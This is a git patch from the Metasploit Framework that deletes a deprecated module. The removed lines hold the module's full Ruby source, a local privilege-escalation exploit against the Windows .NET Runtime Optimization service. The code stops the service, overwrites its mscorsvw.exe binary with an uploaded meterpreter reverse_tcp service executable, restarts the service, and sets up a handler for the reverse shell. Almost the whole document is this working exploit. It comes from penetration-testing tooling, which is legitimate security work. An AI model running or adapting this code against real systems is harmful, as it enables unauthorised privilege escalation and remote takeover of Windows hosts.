From d7375e84eae0a97afcdc42961095fcbba2d449f2 Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Mon, 26 Jan 2015 00:29:43 -0600
Subject: [PATCH] Move modules/post/windows/escalate/net_runtime_modify.rb This module was scheduled to be removed on 01/08/2015. Please use exploit/windows/local/service_permissions instead.
---
.../windows/escalate/net_runtime_modify.rb | 177 ------------------
1 file changed, 177 deletions(-)
delete mode 100644 modules/post/windows/escalate/net_runtime_modify.rb
diff --git a/modules/post/windows/escalate/net_runtime_modify.rb b/modules/post/windows/escalate/net_runtime_modify.rb
deleted file mode 100644
index 97e9fa6ab1..0000000000
--- a/modules/post/windows/escalate/net_runtime_modify.rb
+++ /dev/null
@@ -1,177 +0,0 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-require 'rex'
-
-class Metasploit3 < Msf::Post
-
- require 'msf/core/module/deprecated'
- include Msf::Module::Deprecated
- deprecated Date.new(2015, 1, 8), 'exploit/windows/local/service_permissions'
-
- include Msf::Post::Windows::Services
-
- def initialize(info={})
- super( update_info( info,
- 'Name' => 'Windows Escalate Microsoft .NET Runtime Optimization Service Privilege Escalation',
- 'Description' => %q{
- This module attempts to exploit the security permissions set on the .NET Runtime
- Optimization service. Vulnerable versions of the .NET Framework include 4.0 and 2.0.
- The permissions on this service allow domain users and local power users to modify
- the mscorsvw.exe binary.
- },
- 'License' => MSF_LICENSE,
- 'Author' => [ 'bannedit' ],
- 'Platform' => [ 'win' ],
- 'SessionTypes' => [ 'meterpreter' ],
- 'References' =>
- [
- [ 'OSVDB', '71013' ],
- [ 'EDB', '16940' ]
- ]
- ))
-
- register_options([
- OptAddress.new("LHOST", [ false, "Listener IP address for the new session" ]),
- OptPort.new("LPORT", [ false, "Listener port for the new session", 4444 ]),
- ])
-
- end
-
- def run
- paths = []
- candidate_services = []
- vuln = ""
- @temp = session.sys.config.getenv('TEMP')
-
- if init_railgun() == :error
- return
- end
-
- print_status("Checking for vulnerable .NET Framework Optimization service")
- print_status("This may take a few minutes.")
- # enumerate the installed .NET versions
- each_service do |service|
- if service[:name] =~ /clr_optimization_.*/
- info = service_info(service[:name])
- paths << info[:path]
- candidate_services << service[:name]
- begin
- service_stop(service[:name]) # temporarily stop the service
- print_status("Found #{service[:name]} installed")
- rescue
- print_error("We do not appear to have access to stop #{service[:name]}")
- end
- else
- next
- end
- end
-
- paths.each do |image|
- if check_perms(image)
- vuln << image
- break
- end
- end
-
- if vuln.nil? or vuln.empty?
- print_error("Could not find any vulnerable .NET Framework Optimization services")
- return
- else
- payload = setup_exploit
- end
-
- candidate_services.each do |service|
- session.railgun.kernel32.CopyFileA(payload, vuln, false)
-
- # restart the service
- status = service_restart(service)
-
- if status
- print_status("Restarted #{service}")
- else
- print_error("Failed to restart #{service}")
- end
- return
- end
- end
-
- def check_perms(image)
- if image !~ /mscor/
- return
- end
-
- if !session.railgun.kernel32.MoveFileA(image, image + '.bak')['return']
- print_error("Found Secure Permissions on #{image}")
- return false
- else
- print_status("Found Weak Permissions on #{image}")
- print_status("Exploiting...")
- return true
- end
- end
-
- def init_railgun
- begin
- rg = session.railgun
- if (!rg.get_dll('advapi32'))
- rg.add_dll('advapi32')
- end
- rescue Exception => e
- print_error("Could not initalize railgun")
- print_error("Railgun Error: #{e}")
- return :error
- end
- end
-
- def setup_exploit
- lhost = datastore["LHOST"] || Rex::Socket.source_address
- lport = datastore["LPORT"] || 4444
- p_mod = datastore['PAYLOAD'] || "windows/meterpreter/reverse_tcp"
- file = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
-
- payload = session.framework.payloads.create(p_mod)
- payload.datastore['LHOST'] = lhost
- payload.datastore['LPORT'] = lport
-
- exe = Msf::Util::EXE.to_win32pe_service(session.framework, payload.generate)
- begin
- print_status("Uploading payload #{file} executable to temp directory")
- # Upload the payload to the filesystem
- file = @temp + "\\" + file
- fd = session.fs.file.new(file, "wb")
- print_status("Writing #{file}...")
- fd.write(exe)
- fd.close
- rescue Exception => e
- print_error("Error uploading file #{file}: #{e.class} #{e}")
- return
- end
-
- print_status("Setting up multi/handler...")
- print_status("Using Payload #{p_mod}...")
- handler = session.framework.exploits.create("multi/handler")
- handler.register_parent(self)
- handler.datastore['PAYLOAD'] = p_mod
- handler.datastore['LHOST'] = lhost
- handler.datastore['LPORT'] = lport
- handler.datastore['InitialAutoRunScript'] = "migrate -f"
- handler.datastore['ExitOnSession'] = true
- handler.datastore['ListenerTimeout'] = 300
- handler.datastore['ListenerComm'] = 'local'
-
- # handler.exploit_module = self
- handler.exploit_simple(
- 'LocalInput' => self.user_input,
- 'LocalOutput' => self.user_output,
- 'Payload' => handler.datastore['PAYLOAD'],
- 'RunAsJob' => true
- )
-
- print_status("Upload complete")
- return file
- end
-end